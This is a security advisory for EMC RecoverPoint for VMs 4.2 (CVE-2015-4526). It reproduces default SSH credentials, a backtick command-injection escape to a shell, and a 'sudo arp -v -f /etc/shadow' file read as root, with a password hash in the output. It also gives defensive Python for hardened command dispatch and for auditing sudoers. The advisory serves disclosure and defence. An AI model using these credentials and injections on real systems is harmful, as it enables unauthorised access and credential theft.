SSD Advisory – EMC RecoverPoint for Virtual Machines (VMs) Restriction Bypass

Vulnerability Description
RecoverPoint’s virtual appliance is accessible via SSH with the default credentials boxmgmt:boxmgmt; during testing, no option to change this password was found. Using these credentials, it is possible to escape the management interface via command injection, drop into a shell, and then abuse sudo-privileged operations to read arbitrary files as root. It may also be possible to execute arbitrary OS commands as root, but this was not confirmed.

Analysis / Reproduction
Bug #1: Escape-to-Shell

$ ssh boxmgmt@emc-vrpa
Password: [boxmgmt]
Initializing Installation Manager... done
Installation Manager - RecoverPoint Version 4.2(mercury.92) Cluster vrpa RPA 1
** Main Menu **
[1] Installation
[2] Setup
[3] Diagnostics
[…]
vrpa RPA 1: 3
** Diagnostics **
[…]
[5] Run internal command
[M] Main Menu
[B] Back
[Q] Quit
vrpa RPA 1: 5
[…]
Enter internal command: ssh `bash>&2`
boxmgmt@RecoverPoint-0x7c037c1d8ca0d2bd-RPA1:~$ uname -a;id
Linux RecoverPoint-0x7c037c1d8ca0d2bd-RPA1 3.0.56-k3 #11 SMP Tue May 21 13:50:27 IDT 2013 x86_64 GNU/Linux
uid=562(boxmgmt) gid=562(boxmgmt) groups=562(boxmgmt)

Bug #2: Arbitrary File Read with Root Privileges
/bin/run_boxmgmt (the management interface) calls the Java core UI, which is located on the box at:
/home/kos/kashya/archive/classes/com.kashya.recoverpoint.installation.client.jar
After extracting the JAR and decompiling RunInternalCmdUIStep.class, we can see that several commands are run with root privileges via sudo:

public class RunInternalCmdUIStep
[…]
    // Map of permitted command names; TRUE means the command is prefixed with sudo
    allowedCmds.put("arp", Boolean.TRUE);
    allowedCmds.put("arping", Boolean.TRUE);
    allowedCmds.put("date", Boolean.FALSE);
    allowedCmds.put("ethtool", Boolean.TRUE);
    allowedCmds.put("kps.pl", Boolean.TRUE);
[…]
    try
    {
      // Only cmdName is checked against the map; the complete user-supplied
      // internalCmd string is written out unchanged for run_boxmgmt to execute
      PrintStream ps = new PrintStream("/tmp/internal_cmd");
      if (((Boolean)allowedCmds.get(cmdName)).booleanValue()) {
        ps.print("sudo ");
      }
      ps.print(internalCmd);
      ps.close();
    }

run_boxmgmt then reads the contents of /tmp/internal_cmd and executes the command on behalf of the caller.
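The dispatch pattern above (check the command name, then execute the whole string through a shell) is what makes Bug #1 possible, and the lack of any argument restriction is what feeds Bug #2. The following is an added example, not RecoverPoint code: it reproduces the weak check in `vulnerable_build` and places a hardened dispatcher beside it that rejects shell metacharacters, tokenizes the input, allowlists both the command name and its options, and runs the result as an argv list without a shell. The `ssh` map entry is assumed from the sudoers listing (the decompiled excerpt elides it), and the per-command option policy is a constructed illustration.

```python
"""Allowlist-based internal-command dispatch: the weak check from the
decompiled RunInternalCmdUIStep beside a hardened version.  Added example,
not RecoverPoint code; function names and the option policy are assumptions."""
import re
import shlex
import subprocess

# Mirrors the allowedCmds map in the advisory (True = run via sudo).  "ssh" is
# assumed from the sudoers listing; the decompiled excerpt elides that entry.
ALLOWED_CMDS = {
    "arp": True,
    "arping": True,
    "date": False,
    "ethtool": True,
    "kps.pl": True,
    "ssh": True,
}

# Constructed per-command option allowlist for the hardened path.  Anything not
# listed, e.g. arp's -f <file>, is rejected before sudo is ever reached.
ARG_POLICY = {
    "arp": {"-a", "-n"},
    "arping": {"-c", "-I"},
    "date": set(),
    "ethtool": set(),
    "kps.pl": set(),
    "ssh": set(),
}

SHELL_META = set("`$|&;<>()\\\"'*?[]{}~#\n")
PLAIN_TOKEN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._:-]*$")


class RejectedCommand(ValueError):
    """Raised when a submitted internal command fails validation."""


def vulnerable_build(internal_cmd: str) -> str:
    """The pattern from the page: compare only the first word against the
    allowlist, then hand the *entire* string to a shell (returned here as the
    line that would be executed).  Everything after the command name, including
    backticks, is interpreted by that shell."""
    cmd_name = internal_cmd.split()[0]
    if cmd_name not in ALLOWED_CMDS:
        raise RejectedCommand(cmd_name)
    prefix = "sudo " if ALLOWED_CMDS[cmd_name] else ""
    return prefix + internal_cmd


def hardened_build(internal_cmd: str) -> list:
    """Hardened dispatch: refuse shell metacharacters outright, tokenize with
    shlex, require an allowlisted bare command name (no path component),
    restrict options per command, and return an argv list for subprocess."""
    bad = sorted(set(internal_cmd) & SHELL_META)
    if bad:
        raise RejectedCommand("shell metacharacters not permitted: %r" % (bad,))
    argv = shlex.split(internal_cmd)
    if not argv:
        raise RejectedCommand("empty command")
    name, args = argv[0], argv[1:]
    if "/" in name or name not in ALLOWED_CMDS:
        raise RejectedCommand("command not allowlisted: %r" % name)
    for tok in args:
        if tok.startswith("-"):
            if tok not in ARG_POLICY[name]:
                raise RejectedCommand("option not permitted for %s: %r" % (name, tok))
        elif not PLAIN_TOKEN.match(tok):
            raise RejectedCommand("argument not permitted: %r" % tok)
    return (["sudo"] if ALLOWED_CMDS[name] else []) + [name] + args


def is_rejected(internal_cmd: str) -> bool:
    """True if the hardened validator refuses the input."""
    try:
        hardened_build(internal_cmd)
    except RejectedCommand:
        return True
    return False


def run_internal(internal_cmd: str) -> subprocess.CompletedProcess:
    """Execute a validated command with shell=False and no /tmp hand-off file."""
    return subprocess.run(hardened_build(internal_cmd), shell=False,
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for cmd in ("arp -n", "date", "arping -c 1 10.0.0.1", "arp -v -f /etc/shadow"):
        verdict = "REJECTED" if is_rejected(cmd) else hardened_build(cmd)
        print("%-24s weak check -> %-30s hardened -> %s" % (cmd, vulnerable_build(cmd), verdict))
```

The hardened path never re-parses the input through a shell, so backticks, `;` and redirections are refused as data rather than interpreted, and because options are allowlisted per command the `arp -v -f <file>` route from Bug #2 is closed at the application layer as well.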
For example, we see that boxmgmt can execute the ‘arp’ binary with sudo. arp can be given a file to read and, with the verbose flag, will print the file's contents upon a parse error. So, if we wanted to read any file as root, we could leverage arp like this:

boxmgmt@RecoverPoint-0x7c037c1d8ca0d2bd-RPA1:~$ sudo arp -v -f /etc/shadow
>> root:$1$Hy6MAnOy$tlHmRGo2lO4jzlcM42Uto0:13933:0:99999:7:::
arp: format error on line 1 of etherfile /etc/shadow !
>> daemon:*:16040:0:99999:7:::
[...]

We can use this bug to gain further insight by reading the /etc/sudoers file:

root          ALL = (ALL) ALL
[…]
boxmgmt       ALL = NOPASSWD: /home/kos/kbox/src/installation/Installation/scripts/run_collect_kbox_info.sh
boxmgmt       ALL = NOPASSWD: /usr/bin/ssh
boxmgmt       ALL = NOPASSWD: /usr/sbin/ethtool
boxmgmt       ALL = NOPASSWD: /usr/sbin/arp
boxmgmt       ALL = NOPASSWD: /usr/bin/arping
boxmgmt       ALL = NOPASSWD: /usr/bin/kps.pl

If any of these other binaries or scripts could be further leveraged into executing arbitrary commands (instead of just reading files), dropping into a root shell would be trivial.
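The sudoers rules above grant passwordless root for bare binaries, so any arguments (including arp's `-f <file>`) are accepted. Below is an added example, not vendor code: a small audit that parses a sudoers fragment, flags NOPASSWD rules whose arguments are unrestricted, and shows the argument-pinned form that sudoers itself supports. The input is constructed from the lines quoted in this advisory, and the hardened rules are an illustration of the syntax rather than the vendor's fix.

```python
"""Audit sudoers rules for NOPASSWD entries whose command arguments are left
unrestricted, which is what let `sudo arp -v -f <file>` read files as root.
Added example, not vendor code; the input below is constructed from the
sudoers lines quoted in the advisory."""
import re

SUDOERS_SAMPLE = """\
root          ALL = (ALL) ALL
boxmgmt       ALL = NOPASSWD: /home/kos/kbox/src/installation/Installation/scripts/run_collect_kbox_info.sh
boxmgmt       ALL = NOPASSWD: /usr/bin/ssh
boxmgmt       ALL = NOPASSWD: /usr/sbin/ethtool
boxmgmt       ALL = NOPASSWD: /usr/sbin/arp
boxmgmt       ALL = NOPASSWD: /usr/bin/arping
boxmgmt       ALL = NOPASSWD: /usr/bin/kps.pl
"""

# Constructed illustration of argument-pinned rules: an explicit argument
# string permits only that invocation, and "" permits no arguments at all.
HARDENED_SAMPLE = """\
boxmgmt       ALL = NOPASSWD: /usr/sbin/arp -n, /usr/sbin/arp -a
boxmgmt       ALL = NOPASSWD: /usr/bin/arping -c 1 *
boxmgmt       ALL = NOPASSWD: /usr/sbin/ethtool ""
"""

# user  host = (runas) [TAG:]... command [args][, command [args]]...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")
SKIP_KEYWORDS = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_rules(text):
    """Return one dict per command in each user specification line.
    Comments, blank lines, Defaults and alias lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.split()[0] in SKIP_KEYWORDS:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = []
        for entry in (e.strip() for e in m.group("spec").split(",")):
            while True:  # a tag persists for the later entries on the same line
                t = TAG_RE.match(entry)
                if not t:
                    break
                tags.append(t.group(1))
                entry = entry[t.end():]
            parts = entry.split(None, 1)
            if not parts:
                continue
            rules.append({
                "user": m.group("user"), "host": m.group("host"),
                "runas": m.group("runas") or "root", "tags": list(tags),
                "command": parts[0], "args": parts[1] if len(parts) > 1 else None,
            })
    return rules


def audit(text):
    """Flag NOPASSWD rules that run any command, or an argument-unrestricted
    command, as root.  A bare path in sudoers permits arbitrary arguments."""
    findings = []
    for r in parse_rules(text):
        if "NOPASSWD" not in r["tags"] or r["runas"] not in ("root", "ALL"):
            continue
        if r["command"] == "ALL":
            findings.append((r["user"], r["command"], "passwordless root for any command"))
        elif r["args"] is None:
            findings.append((r["user"], r["command"], "arguments unrestricted"))
    return findings


if __name__ == "__main__":
    for user, command, reason in audit(SUDOERS_SAMPLE):
        print("%-10s %-60s %s" % (user, command, reason))
    print("hardened fragment findings:", audit(HARDENED_SAMPLE))
```

Pinning arguments in sudoers closes the file-read route for arp at the policy layer independently of the management interface. Note that a `*` in a sudoers argument list matches any number of arguments, not just one, so wildcards like the arping line should be reviewed as carefully as bare paths.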
Vulnerable Version
EMC RecoverPoint for VMs version 4.2
CVE
A single CVE has been assigned for this vulnerability: CVE-2015-4526.
Vendor Response
The vendor has issued an advisory: http://seclists.org/bugtraq/2015/Jul/att-59/ESA-2015-115.txt
